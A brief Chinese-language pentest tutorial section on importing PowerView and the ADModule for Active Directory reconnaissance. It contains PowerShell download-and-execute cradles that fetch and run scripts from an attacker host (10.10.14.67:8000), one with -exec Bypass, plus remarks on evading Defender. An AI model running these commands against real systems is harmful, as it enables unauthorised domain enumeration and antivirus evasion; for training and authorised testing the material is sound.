# 3.4.1 基本脚本模块导入

[Powerview项目地址](https://github.com/ianxtianxt/PowerSploit/blob/master/Recon/PowerView.ps1)

```bash
Import-Module C:\Users\zerosec\Documents\powerview.ps1

```

![1.png](images/yushentou/d751af0e1d3f4f0a9d90ebe4f6dcdc44.png)

[ADModule项目地址](https://github.com/ianxtianxt/ADModule)，不需要安装RSAT即可使用AD模块：

使用dll导入：

```bash
Import-Module D:\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.dll -Verbose

```

或者直接导入ActiveDirectory.ps1

```bash
iex (new-Object Net.WebClient).DownloadString('http://10.10.14.67:8000/Import-ActiveDirectory.ps1');Import-ActiveDirectory

```

因为是微软签名的模块，所以ActiveDirectory能够达到一定程度的免杀效果、powerview直接被defender识别（powerview实际用起来更方便）：

![2.png](images/yushentou/e1240ef95e834fd9a20f8518d43509b6.png)

加载到内存执行（只能绕过powershell策略，而不能绕过杀软对powerview的检测）

```bash
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.67:8000/powerview.ps1');Get-NetDomainController"

```